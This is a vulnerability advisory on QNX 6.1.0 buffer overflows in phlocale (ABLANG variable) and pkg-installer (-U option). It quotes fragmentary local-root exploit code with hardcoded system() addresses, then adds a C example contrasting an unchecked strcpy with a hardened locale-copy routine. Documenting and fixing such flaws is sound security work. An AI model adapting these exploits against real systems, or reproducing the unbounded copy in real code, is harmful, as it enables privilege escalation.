[Original] Multiple buffer overflows in realtime operating system (RTOS) 6.1.0 allow local users to execute arbitrary code via (1) a long ABLANG environment variable in phlocale or (2) a long -u option to pkg-installer.
The QNX phlocale utility is prone to an exploitable buffer overflow condition. This is due to insufficient bounds checking of the ABLANG environment variable. Exploitation of this issue may result in execution of arbitrary attacker-supplied instructions as root.
/* QNX phlocale $ABLANG exploit, gives you a cute euid=0 shell.
* If it doesn't work for you, then you most likely need to change
* the address to system() and/or the ret.
"\x80\x95\x04\x08" //system() address
It has been reported that the pkg-installer utility for QNX is vulnerable to a buffer overflow condition.
The vulnerability is a result of an unbounded string copy of the argument to the "-U" command-line option of pkg-installer into a local buffer.
/* Quick and dirty QNX pkg-installer root exploit.
* The shellcode sucks, it is longer than it has
* to be and you need the address to system() for
* it to work. Yes I know I'm lazy....
int main(int argc, char **argv)
"\xe4\xb4\x04\x08" //system() address
printf("using ret %x\n",ret);
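Both advisories above describe the same defect class: an attacker-controlled string (the ABLANG environment variable, or the -U argument) copied into a fixed-size local buffer with no bounds check. The following is an added illustration, not QNX source and not the exploit code quoted above: a hypothetical locale-name handler showing the unbounded copy next to a hardened version that validates length and character set before copying. LOCALE_MAX, the function names and the sample values are all constructed for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical buffer size; the real utilities' sizes are not on the page. */
#define LOCALE_MAX 32
/* Constructed over-long value (64 bytes), longer than LOCALE_MAX. */
#define OVERLONG_ABLANG "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

/* Vulnerable pattern: copy without any length check. A value longer than
 * the destination overruns the stack buffer, which in a setuid root binary
 * is exactly what the advisories describe. Shown only for contrast. */
static void locale_copy_unchecked(char *dst, const char *src) {
    strcpy(dst, src);
}

/* Hardened form. Returns 0 on success, -1 if the value is missing, empty,
 * too long for dst, or contains characters a locale name never needs.
 * Over-long input is refused outright rather than silently truncated. */
static int locale_copy_checked(char *dst, size_t dstlen, const char *src) {
    if (src == NULL || dstlen == 0) return -1;
    size_t n = strnlen(src, dstlen);      /* never scans past dstlen bytes */
    if (n == 0 || n >= dstlen) return -1; /* empty, or no room for the NUL */
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)src[i];
        if (!(isalnum(c) || c == '_' || c == '-' || c == '.' || c == '@'))
            return -1;
    }
    memcpy(dst, src, n);
    dst[n] = '\0';
    return 0;
}

/* Convenience wrapper: would this value be accepted into a LOCALE_MAX buffer? */
static int accepts_locale(const char *src) {
    char buf[LOCALE_MAX];
    return locale_copy_checked(buf, sizeof buf, src);
}

int main(void) {
    char buf[LOCALE_MAX];
    locale_copy_unchecked(buf, "en_US");            /* safe only because input is short */
    printf("unchecked copy of en_US: %s\n", buf);
    printf("checked  en_US        -> %d\n", accepts_locale("en_US"));
    printf("checked  64 x 'A'     -> %d\n", accepts_locale(OVERLONG_ABLANG));
    printf("checked  'en US;id'   -> %d\n", accepts_locale("en US;id"));
    return 0;
}
```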